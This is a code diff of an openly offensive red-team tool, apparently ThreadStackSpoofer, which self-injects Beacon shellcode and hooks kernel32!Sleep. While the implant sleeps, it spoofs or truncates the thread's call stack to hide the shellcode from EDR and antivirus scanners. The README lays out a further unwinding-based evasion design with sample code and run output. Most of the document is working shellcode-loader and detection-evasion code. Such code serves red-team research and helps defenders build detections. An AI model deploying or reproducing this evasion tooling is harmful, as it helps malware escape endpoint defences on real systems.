🤬
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 11 lines
    12 12  Implementation along with my [ShellcodeFluctuation](https://github.com/mgeeky/ShellcodeFluctuation) brings Offensive Security community sample implementations to catch up on the offering made by commercial C2 products, so that we can do no worse in our Red Team toolings. 💪
    13 13   
    14 14   
     15 +### Implementation has changed
     16 + 
     17 +Current implementation differs heavily to what was originally published. This is because I realised that there is a way simpler approach to terminate thread's call stack and hide shellcode's related frames by simply writing `0` to the return address of our handler:
     18 + 
     19 +```
     20 +void WINAPI MySleep(DWORD _dwMilliseconds)
     21 +{
     22 + [...]
     23 + PULONG_PTR overwrite = (PULONG_PTR)_AddressOfReturnAddress();
     24 + *overwrite = 0;
     25 + 
     26 + [...]
     27 + *overwrite = origReturnAddress;
     28 +}
     29 +```
     30 + 
     31 +The previous implementation, utilising `StackWalk64` can be accessed in this [commit c250724](https://github.com/mgeeky/ThreadStackSpoofer/tree/c2507248723d167fb2feddf50d35435a17fd61a2).
     32 + 
     33 + 
    15 34  ## How it works?
    16 35   
    17 36  This program performs self-injection shellcode (roughly via classic `VirtualAlloc` + `memcpy` + `CreateThread`).
    skipped 8 lines
    26 45  3. Hook `kernel32!Sleep` pointing back to our callback.
    27 46  4. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread`. A slight twist here is that our thread starts from a legitimate `ntdll!RltUserThreadStart+0x21` address to mimic other threads
    28 47  5. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked.
    29  -6. Stack Spoofing begins.
    30  -7. Firstly we walk call stack of our current thread, utilising `ntdll!RtlCaptureContext` and `dbghelp!StackWalk64`
    31  -8. We save all of the stack frames that match our `seems-to-be-beacon-frame` criterias (such as return address points back to a memory being `MEM_PRIVATE` or `Type = 0`, or memory's protection flags are not `R/RX/RWX`)
    32  -9. We terate over collected frames (gathered function frame pointers `RBP/EBP` - in `frame.frameAddr`) and overwrite _on-stack_ return addresses with a fake `::CreateFileW` address.
    33  -10. Finally a call to `::SleepEx` is made to let the Beacon's sleep while waiting for further communication.
    34  -11. After Sleep is finished, we restore previously saved original function return addresses and execution is resumed.
     48 +6. Overwrite last return address on the stack to `0` which effectively should finish the call stack.
     49 +7. Finally a call to `::SleepEx` is made to let the Beacon's sleep while waiting for further communication.
     50 +8. After Sleep is finished, we restore previously saved original function return addresses and execution is resumed.
    35 51   
    36 52  Function return addresses are scattered all around the thread's stack memory area, pointed to by `RBP/EBP` register. In order to find them on the stack, we need to firstly collect frame pointers, then dereference them for overwriting:
    37 53   
    skipped 16 lines
    54 70   
    55 71  This in turn, when thread stack spoofing is enabled:
    56 72   
    57  -![spoofed](images/spoofed.png)
    58  - 
    59  -Above we can see a sequence of `kernel32!CreateFileW` being implanted as return addresses. That's merely an example proving that we can manipulate return addresses.
    60  -To better enhance quality of this call stack, one could prepare a list of addresses and then use them while picking subsequent frames for overwriting.
    61  - 
    62  -For example, a following chain of addresses could be used:
     73 +![spoofed](images/spoofed2.png)
    63 74   
     75 +Above we can see that the last frame on our call stack is our `MySleep` callback. That immediately brings opportunities for IOCs hunting for threads having call stacks not unwinding into following two commonly expected system entry points:
    64 76  ```
    65  -KernelBase.dll!WaitForSingleObjectEx+0x8e
    66  -KernelBase.dll!WaitForSingleObject+0x52
    67 77  kernel32!BaseThreadInitThunk+0x14
    68 78  ntdll!RtlUserThreadStart+0x21
    69 79  ```
    70 80   
    71  -When thinking about AVs, EDRs and other automated scanners - we don't need to care about how much legitimate our thread's call stack look, since these scanners only care whether a frame points back to a `SEC_IMAGE` memory pages, meaning it was a legitimate DLL/EXE call (and whether these DLLs are trusted/signed themselves). Thus, we don't need to bother that much about these chain of `CreateFileW` frames.
     81 +However a brief examination of my system shown, that there are plenty of threads having call stacks not unwinding to the above handlers:
     82 + 
     83 +![legit call stack](images/legit-call-stack.png)
     84 + 
     85 +The above screenshot shows unmodified, unhooked, thread of Total Commander x64.
     86 + 
     87 +Why should we care about carefully faking our call stack when there are processes exhibiting traits that we can simply mimic?
     88 + 
    72 89   
    73 90   
    74 91  ## How do I use it?
    skipped 30 lines
    105 122  4. Create a new user stack with `RtlCreateUserStack` / `RtlFreeUserStack` and exchange stacks from a Beacons thread into that newly created one
    106 123   
    107 124   
     125 +## Implementing a true Thread Stack Spoofer
     126 + 
     127 +Hours-long conversation with [namazso](https://twitter.com/namazso) teached me, that in order to aim for a proper thread stack spoofer we would need to reverse x64 call stack unwinding process.
     128 +Firstly, one needs to carefully acknowledge the stack unwinding process explained in (a) linked below. The system when traverses Thread call stack on x64 architecture will not simply rely on return addresses scattered around the thread's stack, but rather it:
     129 + 
     130 +1. takes return address
     131 +2. attempts to identify function containing that address (with [RtlLookupFunctionEntry](https://docs.microsoft.com/en-us/windows/win32/api/winnt/nf-winnt-rtllookupfunctionentry))
     132 +3. That function returns `RUNTIME_FUNCTION`, `UNWIND_INFO` and `UNWIND_CODE` structures. These structures describe where are the function's beginning address, ending address, and where are all the code sequences that modify `RBP` or `RSP`.
     133 +4. System needs to know about all stack & frame pointers modifications that happened in each function across the Call Stack to then virtually _rollback_ these changes and virtually restore call stack pointers when a call to the processed call stack frame happened (this is implemented in [RtlVirtualUnwind](https://docs.microsoft.com/ru-ru/windows/win32/api/winnt/nf-winnt-rtlvirtualunwind))
     134 +5. The system processes all `UNWIND_CODE`s that examined function exhbits to precisely compute the location of that frame's return address and stack pointer value.
     135 +6. Through this emulation, the System is able to walk down the call stacks chain and effectively "unwind" the call stack.
     136 + 
     137 +In order to interfere with this process we wuold need to _revert it_ by having our reverted form of `RtlVirtualUnwind`. We would need to iterate over functions defined in a module (let's be it `kernel32`), scan each function's `UNWIND_CODE` codes and closely emulate it backwards (as compared to `RtlVirtualUnwind` and precisely `RtlpUnwindPrologue`) in order to find locations on the stack, where to put our fake return addresses.
     138 + 
     139 +[namazso](https://twitter.com/namazso) mentions the necessity to introduce 3 fake stack frames to nicely stitch the call stack:
     140 + 
     141 +1. A "desync" frame (consider it as a _gadget-frame_) that unwinds differently compared to the caller of our `MySleep` (having differnt `UWOP` - Unwind Operation code). We do this by looking through all functions from a module, looking through their UWOPs, calculating how big the fake frame should be. This frame must have UWOPS **different** than our `MySleep`'s caller.
     142 +2. Next frame that we want to find is a function that unwindws by popping into `RBP` from the stack - basically through `UWOP_PUSH_NONVOL` code.
     143 +3. Third frame we need a function that restores `RSP` from `RBP` through the code `UWOP_SET_FPREG`
     144 + 
     145 +The restored `RSP` must be set with the `RSP` taken from wherever control flow entered into our `MySleep` so that all our frames become hidden, as a result of third gadget unwinding there.
     146 + 
     147 +In order to begin the process, one can iterate over executable's `.pdata` by dereferencing `IMAGE_DIRECTORY_ENTRY_EXCEPTION` data directory entry.
     148 +Consider below example:
     149 + 
     150 +```
     151 + ULONG_PTR imageBase = (ULONG_PTR)GetModuleHandleA("kernel32");
     152 + PIMAGE_NT_HEADERS64 pNthdrs = PIMAGE_NT_HEADERS64(imageBase + PIMAGE_DOS_HEADER(imageBase)->e_lfanew);
     153 + 
     154 + auto excdir = pNthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
     155 + if (excdir.Size == 0 || excdir.VirtualAddress == 0)
     156 + return;
     157 + 
     158 + auto begin = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase);
     159 + auto end = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase + excdir.Size);
     160 + 
     161 + UNWIND_HISTORY_TABLE mshist = { 0 };
     162 + DWORD64 imageBase2 = 0;
     163 + 
     164 + PRUNTIME_FUNCTION currFrame = RtlLookupFunctionEntry(
     165 + (DWORD64)caller,
     166 + &imageBase2,
     167 + &mshist
     168 + );
     169 + 
     170 + UNWIND_INFO *mySleep = (UNWIND_INFO*)(currFrame->UnwindData + imageBase);
     171 + UNWIND_CODE myFrameUwop = (UNWIND_CODE)(mySleep->UnwindCodes[0]);
     172 + 
     173 + log("1. MySleep RIP UWOP: ", myFrameUwop.UnwindOpcode);
     174 + 
     175 + for (PRUNTIME_FUNCTION it = begin; it < end; ++it)
     176 + {
     177 + UNWIND_INFO* unwindData = (UNWIND_INFO*)(it->UnwindData + imageBase);
     178 + UNWIND_CODE frameUwop = (UNWIND_CODE)(unwindData->UnwindCodes[0]);
     179 + 
     180 + if (frameUwop.UnwindOpcode != myFrameUwop.UnwindOpcode)
     181 + {
     182 + // Found candidate function for a desynch gadget frame
     183 + 
     184 + }
     185 + }
     186 +```
     187 + 
     188 +The process is a bit convoluted, yet boils down to reverting thread's call stack unwinding process by substituting arbitrary stack frames with carefully selected other ones, in a ROP alike approach.
     189 + 
     190 +This PoC does not follows replicate this algorithm, because my current understanding allows me to accept the call stack finishing on an `EXE`-based stack frame and I don't want to overcompliate neither my shellcode loaders nor this PoC. Leaving the exercise of implementing this and sharing publicly to a keen reader. Or maybe I'll sit and have a try on doing this myself given some more spare time :)
     191 + 
     192 + 
     193 +**More information**:
     194 + 
     195 +a) [x64 exception handling - Stack Unwinding process explained](https://docs.microsoft.com/en-us/cpp/build/exception-handling-x64?view=msvc-160)
     196 +b) [Sample implementation of `RtlpUnwindPrologue` and `RtlVirtualUnwind`](https://github.com/mic101/windows/blob/master/WRK-v1.2/base/ntos/rtl/amd64/exdsptch.c)
     197 +c) [`.pdata` section](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#the-pdata-section)
     198 +d) [another sample implementation of `RtlpUnwindPrologue`](https://github.com/hzqst/unicorn_pe/blob/master/unicorn_pe/except.cpp#L773)
     199 + 
     200 + 
    108 201  ## Example run
    109 202   
    110 203  Use case:
    skipped 10 lines
    121 214  Example run that spoofs beacon's thread call stack:
    122 215   
    123 216  ```
    124  -C:\> ThreadStackSpoofer.exe beacon64.bin 1
     217 +PS D:\dev2\ThreadStackSpoofer> .\x64\Release\ThreadStackSpoofer.exe .\tests\beacon64.bin 1
    125 218  [.] Reading shellcode bytes...
    126  -[.] Thread call stack will be spoofed.
    127  -[+] Stack spoofing initialized.
    128 219  [.] Hooking kernel32!Sleep...
    129 220  [.] Injecting shellcode...
    130  - 
    131  -WalkCallStack: Stack Trace:
    132  - 2. calledFrom: 0x7ff7c8ba7f54 - stack: 0xdc5eaffbd0 - frame: 0xdc5eaffce0 - ret: 0x2550d3ebd51 - skip? 0
    133  - 3. calledFrom: 0x2550d3ebd51 - stack: 0xdc5eaffcf0 - frame: 0xdc5eaffce8 - ret: 0x1388 - skip? 0
    134  - 4. calledFrom: 0x 1388 - stack: 0xdc5eaffcf8 - frame: 0xdc5eaffcf0 - ret: 0x2550d1ff760 - skip? 0
    135  - 5. calledFrom: 0x2550d1ff760 - stack: 0xdc5eaffd00 - frame: 0xdc5eaffcf8 - ret: 0x1b000100000004 - skip? 0
    136  - 6. calledFrom: 0x1b000100000004 - stack: 0xdc5eaffd08 - frame: 0xdc5eaffd00 - ret: 0xd00017003a0001 - skip? 0
    137  - 7. calledFrom: 0xd00017003a0001 - stack: 0xdc5eaffd10 - frame: 0xdc5eaffd08 - ret: 0x2550d5b7040 - skip? 0
    138  - 8. calledFrom: 0x2550d5b7040 - stack: 0xdc5eaffd18 - frame: 0xdc5eaffd10 - ret: 0x2550d3ccd9f - skip? 0
    139  - 9. calledFrom: 0x2550d3ccd9f - stack: 0xdc5eaffd20 - frame: 0xdc5eaffd18 - ret: 0x2550d3ccdd0 - skip? 0
    140  - Spoofed: 0x2550d3ebd51 -> 0x7ffeb7f74b60
    141  - Spoofed: 0x00001388 -> 0x7ffeb7f74b60
    142  - Spoofed: 0x2550d1ff760 -> 0x7ffeb7f74b60
    143  - Spoofed: 0x1b000100000004 -> 0x7ffeb7f74b60
    144  - Spoofed: 0xd00017003a0001 -> 0x7ffeb7f74b60
    145  - Spoofed: 0x2550d5b7040 -> 0x7ffeb7f74b60
    146  - Spoofed: 0x2550d3ccd9f -> 0x7ffeb7f74b60
    147  - Spoofed: 0x2550d3ccdd0 -> 0x7ffeb7f74b60
     221 +[+] Shellcode is now running.
     222 +[>] Original return address: 0x1926747bd51. Finishing call stack...
    148 223   
    149 224  ===> MySleep(5000)
    150 225   
    151  -[+] Shellcode is now running.
     226 +[<] Restoring original return address...
     227 +[>] Original return address: 0x1926747bd51. Finishing call stack...
    152 228   
    153  -WalkCallStack: Stack Trace:
    154  - 2. calledFrom: 0x7ff7c8ba7f84 - stack: 0xdc5eaffbd0 - frame: 0xdc5eaffce0 - ret: 0x7ffeb7f74b60 - skip? 1
    155  - 3. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffcf0 - frame: 0xdc5eaffce8 - ret: 0x7ffeb7f74b60 - skip? 1
    156  - 4. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffcf8 - frame: 0xdc5eaffcf0 - ret: 0x7ffeb7f74b60 - skip? 1
    157  - 5. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd00 - frame: 0xdc5eaffcf8 - ret: 0x7ffeb7f74b60 - skip? 1
    158  - 6. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd08 - frame: 0xdc5eaffd00 - ret: 0x7ffeb7f74b60 - skip? 1
    159  - 7. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd10 - frame: 0xdc5eaffd08 - ret: 0x7ffeb7f74b60 - skip? 1
    160  - 8. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd18 - frame: 0xdc5eaffd10 - ret: 0x7ffeb7f74b60 - skip? 1
    161  - 9. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd20 - frame: 0xdc5eaffd18 - ret: 0x7ffeb7f74b60 - skip? 1
    162  - Restored: 0x7ffeb7f74b60 -> 0x2550d3ebd51
    163  - Restored: 0x7ffeb7f74b60 -> 0x1388
    164  - Restored: 0x7ffeb7f74b60 -> 0x2550d1ff760
    165  - Restored: 0x7ffeb7f74b60 -> 0x1b000100000004
    166  - Restored: 0x7ffeb7f74b60 -> 0xd00017003a0001
    167  - Restored: 0x7ffeb7f74b60 -> 0x2550d5b7040
    168  - Restored: 0x7ffeb7f74b60 -> 0x2550d3ccd9f
    169  - Restored: 0x7ffeb7f74b60 -> 0x2550d3ccdd0
     229 +===> MySleep(5000)
     230 + 
     231 +[<] Restoring original return address...
     232 +[>] Original return address: 0x1926747bd51. Finishing call stack...
    170 233  ```
    171 234   
    172 235  ## Word of caution
    skipped 54 lines
  • ■ ■ ■ ■ ■
    ThreadStackSpoofer/header.h
    1 1  #pragma once
    2 2   
    3 3  #include <windows.h>
    4  -#include <DbgHelp.h>
    5 4  #include <iostream>
    6 5  #include <sstream>
    7 6  #include <iomanip>
    8 7  #include <vector>
    9  - 
    10 8   
    11 9  typedef void (WINAPI* typeSleep)(
    12 10   DWORD dwMilis
    13 11   );
    14 12   
    15  -typedef BOOL(__stdcall* typeStackWalk64)(
    16  - DWORD MachineType,
    17  - HANDLE hProcess,
    18  - HANDLE hThread,
    19  - LPSTACKFRAME64 StackFrame,
    20  - PVOID ContextRecord,
    21  - PREAD_PROCESS_MEMORY_ROUTINE64 ReadMemoryRoutine,
    22  - PFUNCTION_TABLE_ACCESS_ROUTINE64 FunctionTableAccessRoutine,
    23  - PGET_MODULE_BASE_ROUTINE64 GetModuleBaseRoutine,
    24  - PTRANSLATE_ADDRESS_ROUTINE64 TranslateAddress
    25  - );
    26  - 
    27  -typedef BOOL(__stdcall* typeSymInitialize)(
    28  - IN HANDLE hProcess,
    29  - IN LPCSTR UserSearchPath,
    30  - IN BOOL fInvadeProcess
    31  - );
    32  - 
    33 13  typedef std::unique_ptr<std::remove_pointer<HANDLE>::type, decltype(&::CloseHandle)> HandlePtr;
    34 14   
    35  -struct CallStackFrame
    36  -{
    37  - ULONG_PTR calledFrom;
    38  - ULONG_PTR stackAddr;
    39  - ULONG_PTR frameAddr;
    40  - ULONG_PTR origFrameAddr;
    41  - ULONG_PTR retAddr;
    42  - ULONG_PTR overwriteWhat;
    43  -};
    44  - 
    45  -static const size_t MaxStackFramesToSpoof = 64;
    46  -struct StackTraceSpoofingMetadata
    47  -{
    48  - HMODULE hDbghelp;
    49  - typeStackWalk64 pStackWalk64;
    50  - LPVOID pSymFunctionTableAccess64;
    51  - LPVOID pSymGetModuleBase64;
    52  - bool initialized;
    53  - CallStackFrame spoofedFrame[MaxStackFramesToSpoof];
    54  - size_t spoofedFrames;
    55  -};
    56  - 
    57 15  struct HookedSleep
    58 16  {
    59 17   typeSleep origSleep;
    skipped 11 lines
    71 29   DWORD previousBytesSize;
    72 30  };
    73 31   
    74  - 
    75 32  template<class... Args>
    76 33  void log(Args... args)
    77 34  {
    skipped 3 lines
    81 38   std::cout << oss.str() << std::endl;
    82 39  }
    83 40   
    84  -static const size_t Frames_To_Preserve = 2;
    85 41  static const DWORD Shellcode_Memory_Protection = PAGE_EXECUTE_READ;
    86 42   
    87 43  bool hookSleep();
     44 +void runShellcode(LPVOID param);
    88 45  bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr& thread);
    89 46  bool readShellcode(const char* path, std::vector<uint8_t>& shellcode);
    90  -void walkCallStack(HANDLE hThread, CallStackFrame* frames, size_t maxFrames, size_t* numOfFrames, bool onlyBeaconFrames, size_t framesToPreserve = Frames_To_Preserve);
    91  -bool initStackSpoofing();
    92 47  bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers = NULL);
    93  -void spoofCallStack(bool overwriteOrRestore);
    94 48  void WINAPI MySleep(DWORD _dwMilliseconds);
  • ■ ■ ■ ■ ■
    ThreadStackSpoofer/main.cpp
    skipped 2 lines
    3 3  #include <intrin.h>
    4 4   
    5 5  HookedSleep g_hookedSleep;
    6  -StackTraceSpoofingMetadata g_stackTraceSpoofing;
    7 6   
    8 7   
    9 8  void WINAPI MySleep(DWORD _dwMilliseconds)
    skipped 1 lines
    11 10   const register DWORD dwMilliseconds = _dwMilliseconds;
    12 11   
    13 12   // Perform this (current) thread call stack spoofing.
    14  - spoofCallStack(true);
     13 + PULONG_PTR overwrite = (PULONG_PTR)_AddressOfReturnAddress();
     14 + const register ULONG_PTR origReturnAddress = *overwrite;
     15 + 
     16 + log("[>] Original return address: 0x", std::hex, std::setw(8), std::setfill('0'), origReturnAddress, ". Finishing call stack...");
     17 + *overwrite = 0;
    15 18   
    16 19   log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n");
    17 20   
    skipped 1 lines
    19 22   ::SleepEx(dwMilliseconds, false);
    20 23   
    21 24   // Restore original thread's call stack.
    22  - spoofCallStack(false);
     25 + log("[<] Restoring original return address...");
     26 + *overwrite = origReturnAddress;
    23 27  }
    24 28   
    25 29  bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers /*= NULL*/)
    skipped 87 lines
    113 117   return true;
    114 118  }
    115 119   
    116  -void walkCallStack(HANDLE hThread, CallStackFrame* frames, size_t maxFrames, size_t* numOfFrames, bool onlyBeaconFrames, size_t framesToPreserve)
    117  -{
    118  - CONTEXT c = { 0 };
    119  - STACKFRAME64 s = { 0 };
    120  - DWORD imageType;
    121  - ULONG curRecursionCount = 0;
    122  - 
    123  - c.ContextFlags = CONTEXT_ALL;
    124  - 
    125  - //
    126  - // It looks like RtlCaptureContext was able to acquire running thread's context,
    127  - // while GetThreadContext failed at doing so.
    128  - //
    129  - if (hThread == GetCurrentThread() || hThread == 0)
    130  - RtlCaptureContext(&c);
    131  - else
    132  - GetThreadContext(hThread, &c);
    133  - 
    134  -#ifdef _M_IX86
    135  - const ULONG_PTR invalidAddr = 0xcccccccc;
    136  - // normally, call ImageNtHeader() and use machine info from PE header
    137  - imageType = IMAGE_FILE_MACHINE_I386;
    138  - s.AddrPC.Offset = c.Eip;
    139  - s.AddrPC.Mode = AddrModeFlat;
    140  - s.AddrFrame.Offset = c.Ebp;
    141  - s.AddrFrame.Mode = AddrModeFlat;
    142  - s.AddrStack.Offset = c.Esp;
    143  - s.AddrStack.Mode = AddrModeFlat;
    144  -#elif _M_X64
    145  - const ULONG_PTR invalidAddr = 0xcccccccccccccccc;
    146  - imageType = IMAGE_FILE_MACHINE_AMD64;
    147  - s.AddrPC.Offset = c.Rip;
    148  - s.AddrPC.Mode = AddrModeFlat;
    149  - s.AddrFrame.Offset = c.Rsp;
    150  - s.AddrFrame.Mode = AddrModeFlat;
    151  - s.AddrStack.Offset = c.Rsp;
    152  - s.AddrStack.Mode = AddrModeFlat;
    153  -#elif _M_IA64
    154  - const ULONG_PTR invalidAddr = 0xcccccccccccccccc;
    155  - imageType = IMAGE_FILE_MACHINE_IA64;
    156  - s.AddrPC.Offset = c.StIIP;
    157  - s.AddrPC.Mode = AddrModeFlat;
    158  - s.AddrFrame.Offset = c.IntSp;
    159  - s.AddrFrame.Mode = AddrModeFlat;
    160  - s.AddrBStore.Offset = c.RsBSP;
    161  - s.AddrBStore.Mode = AddrModeFlat;
    162  - s.AddrStack.Offset = c.IntSp;
    163  - s.AddrStack.Mode = AddrModeFlat;
    164  -#else
    165  -#error "Platform not supported!"
    166  -#endif
    167  - 
    168  - log("\nWalkCallStack: Stack Trace: ");
    169  - 
    170  - *numOfFrames = 0;
    171  - ULONG Frame = 0;
    172  - 
    173  - for (Frame = 0; ; Frame++)
    174  - {
    175  - //
    176  - // A call to dbghelp!StackWalk64 that will let us iterate over thread's call stack.
    177  - //
    178  - BOOL result = g_stackTraceSpoofing.pStackWalk64(
    179  - imageType,
    180  - GetCurrentProcess(),
    181  - hThread,
    182  - &s,
    183  - &c,
    184  - NULL,
    185  - (PFUNCTION_TABLE_ACCESS_ROUTINE64)g_stackTraceSpoofing.pSymFunctionTableAccess64,
    186  - (PGET_MODULE_BASE_ROUTINE64)g_stackTraceSpoofing.pSymGetModuleBase64,
    187  - NULL
    188  - );
    189  - 
    190  - if (!result || s.AddrReturn.Offset == 0)
    191  - break;
    192  - 
    193  - if (s.AddrPC.Offset == s.AddrReturn.Offset)
    194  - {
    195  - if (curRecursionCount > 1000)
    196  - {
    197  - // Overly deep recursion spotted, bailing out.
    198  - break;
    199  - }
    200  - curRecursionCount++;
    201  - }
    202  - else
    203  - {
    204  - curRecursionCount = 0;
    205  - }
    206  - 
    207  - CallStackFrame frame = { 0 };
    208  - 
    209  - frame.calledFrom = s.AddrPC.Offset;
    210  - frame.stackAddr = s.AddrStack.Offset;
    211  - frame.frameAddr = s.AddrFrame.Offset;
    212  - frame.retAddr = s.AddrReturn.Offset;
    213  - 
    214  - if (Frame > maxFrames)
    215  - break;
    216  - 
    217  - //
    218  - // Skip first two frames as they most likely link back to our callers - and thus we can't spoof them:
    219  - // MySleep(...) -> spoofCallStack(...) -> ...
    220  - //
    221  - if (Frame < framesToPreserve)
    222  - continue;
    223  - 
    224  - bool skipFrame = false;
    225  - 
    226  - if (onlyBeaconFrames)
    227  - {
    228  - MEMORY_BASIC_INFORMATION mbi = { 0 };
    229  - 
    230  - if (VirtualQuery((LPVOID)frame.retAddr, &mbi, sizeof(mbi)))
    231  - {
    232  - //
    233  - // If a frame points back to memory pages that are not MEM_PRIVATE (originating from VirtualAlloc)
    234  - // we can skip them, as they shouldn't point back to our beacon's memory pages.
    235  - // Also I've noticed, that for some reason parameter for kernel32!Sleep clobbers stack, making it look like
    236  - // it's a frame by its own. That address (5 seconds = 5000ms = 0x1388) when queried with VirtualQuery seems to return
    237  - // mbi.Type == 0. We're using this observation to include such frame in spoofing.
    238  - //
    239  - if (mbi.Type != MEM_PRIVATE && mbi.Type != 0) skipFrame = true;
    240  - 
    241  - }
    242  - 
    243  - if (frame.retAddr == invalidAddr) skipFrame = true;
    244  - }
    245  - 
    246  - if (!skipFrame && frame.retAddr != 0 && frame.frameAddr != 0)
    247  - {
    248  - frames[(*numOfFrames)++] = frame;
    249  - }
    250  - 
    251  - log("\t", std::dec, Frame, ".\tcalledFrom: 0x", std::setw(8), std::hex, frame.calledFrom, " - stack: 0x", frame.stackAddr,
    252  - " - frame: 0x", frame.frameAddr, " - ret: 0x", frame.retAddr, " - skip? ", skipFrame);
    253  - }
    254  -}
    255  - 
    256  -void spoofCallStack(bool overwriteOrRestore)
    257  -{
    258  - CallStackFrame frames[MaxStackFramesToSpoof] = { 0 };
    259  - size_t numOfFrames = 0;
    260  - 
    261  - //
    262  - // Firstly we walk through the current thread's call stack collecting all frames
    263  - // that resemble references to Beacon's allocation pages (or are in any other means anomalous by looking).
    264  - //
    265  - walkCallStack(GetCurrentThread(), frames, _countof(frames), &numOfFrames, true);
    266  - 
    267  - if (overwriteOrRestore)
    268  - {
    269  - for (size_t i = 0; i < numOfFrames; i++)
    270  - {
    271  - auto& frame = frames[i];
    272  - 
    273  - if (g_stackTraceSpoofing.spoofedFrames < MaxStackFramesToSpoof)
    274  - {
    275  - //
    276  - // We will use CreateFileW as a fake return address to place onto the thread's frame on stack.
    277  - //
    278  - frame.overwriteWhat = (ULONG_PTR)::CreateFileW;
    279  - 
    280  - //
    281  - // We're saving original frame to later use it for call stack restoration.
    282  - //
    283  - g_stackTraceSpoofing.spoofedFrame[g_stackTraceSpoofing.spoofedFrames++] = frame;
    284  - }
    285  - }
    286  - 
    287  - for (size_t i = 0; i < g_stackTraceSpoofing.spoofedFrames; i++)
    288  - {
    289  - auto frame = g_stackTraceSpoofing.spoofedFrame[i];
    290  - 
    291  - //
    292  - // We overwrite thread's frame by writing a function pointer onto the thread's stack precisely where
    293  - // the function's return address stored.
    294  - //
    295  - *(PULONG_PTR)(frame.frameAddr + sizeof(ULONG_PTR)) = frame.overwriteWhat;
    296  - 
    297  - log("\t\t\tSpoofed: 0x",
    298  - std::setw(8), std::setfill('0'), std::hex, frame.retAddr, " -> 0x", frame.overwriteWhat);
    299  - }
    300  - }
    301  - else
    302  - {
    303  - for (size_t i = 0; i < g_stackTraceSpoofing.spoofedFrames; i++)
    304  - {
    305  - auto frame = g_stackTraceSpoofing.spoofedFrame[i];
    306  - 
    307  - //
    308  - // Here we restore original return addresses so that our shellcode can continue its execution.
    309  - //
    310  - *(PULONG_PTR)(frame.frameAddr + sizeof(ULONG_PTR)) = frame.retAddr;
    311  - 
    312  - log("\t\t\tRestored: 0x", std::setw(8), std::setfill('0'), std::hex, frame.overwriteWhat, " -> 0x", frame.retAddr);
    313  - }
    314  - 
    315  - memset(g_stackTraceSpoofing.spoofedFrame, 0, sizeof(g_stackTraceSpoofing.spoofedFrame));
    316  - g_stackTraceSpoofing.spoofedFrames = 0;
    317  - }
    318  - 
    319  - return;
    320  -}
    321  - 
    322  -bool initStackSpoofing()
    323  -{
    324  - memset(&g_stackTraceSpoofing, 0, sizeof(g_stackTraceSpoofing));
    325  - 
    326  - //
    327  - // Firstly we need to load dbghelp.dll to resolve necessary functions' pointers.
    328  - //
    329  - g_stackTraceSpoofing.hDbghelp = LoadLibraryA("dbghelp.dll");
    330  - if (!g_stackTraceSpoofing.hDbghelp)
    331  - return false;
    332  - 
    333  - //
    334  - // Now we resolve addresses of a few required functions.
    335  - //
    336  - g_stackTraceSpoofing.pSymFunctionTableAccess64 =
    337  - GetProcAddress(g_stackTraceSpoofing.hDbghelp, "SymFunctionTableAccess64");
    338  - g_stackTraceSpoofing.pSymGetModuleBase64 =
    339  - GetProcAddress(g_stackTraceSpoofing.hDbghelp, "SymGetModuleBase64");
    340  - g_stackTraceSpoofing.pStackWalk64 =
    341  - (typeStackWalk64)GetProcAddress(g_stackTraceSpoofing.hDbghelp, "StackWalk64");
    342  - auto pSymInitialize =
    343  - (typeSymInitialize)GetProcAddress(g_stackTraceSpoofing.hDbghelp, "SymInitialize");
    344  - 
    345  - if (!g_stackTraceSpoofing.pSymFunctionTableAccess64
    346  - || !g_stackTraceSpoofing.pSymGetModuleBase64
    347  - || !g_stackTraceSpoofing.pStackWalk64
    348  - || !pSymInitialize
    349  - )
    350  - return false;
    351  - 
    352  - //
    353  - // Now in order to get StackWalk64 working correctly, we need to call SymInitialize.
    354  - //
    355  - pSymInitialize(GetCurrentProcess(), nullptr, TRUE);
    356  - 
    357  - log("[+] Stack spoofing initialized.");
    358  - g_stackTraceSpoofing.initialized = true;
    359  - return true;
    360  -}
    361  - 
    362 120  bool readShellcode(const char* path, std::vector<uint8_t>& shellcode)
    363 121  {
    364 122   HandlePtr file(CreateFileA(
    skipped 18 lines
    383 141   return ReadFile(file.get(), shellcode.data(), lowSize, &readBytes, NULL);
    384 142  }
    385 143   
    386  -bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr &thread)
     144 +void runShellcode(LPVOID param)
     145 +{
     146 + auto func = ((void(*)())param);
     147 + 
     148 + //
     149 + // Jumping to shellcode. Look at the coment in injectShellcode() describing why we opted to jump
     150 + // into shellcode in a classical manner instead of fancy hooking
     151 + // ntdll!RtlUserThreadStart+0x21 like in ThreadStackSpoofer example.
     152 + //
     153 + func();
     154 +}
     155 + 
     156 +bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr& thread)
    387 157  {
    388 158   //
    389 159   // Firstly we allocate RW page to avoid RWX-based IOC detections
    skipped 18 lines
    408 178   if (!VirtualProtect(alloc, shellcode.size() + 1, Shellcode_Memory_Protection, &old))
    409 179   return false;
    410 180   
     181 + /*
     182 + * We're not setting these pointers to let the hooked sleep handler figure them out itself.
     183 + *
     184 + g_fluctuationData.shellcodeAddr = alloc;
     185 + g_fluctuationData.shellcodeSize = shellcode.size();
     186 + g_fluctuationData.protect = Shellcode_Memory_Protection;
     187 + */
    411 188   
     189 + shellcode.clear();
     190 + 
     191 + //
     192 + // Example provided in previous release of ThreadStackSpoofer:
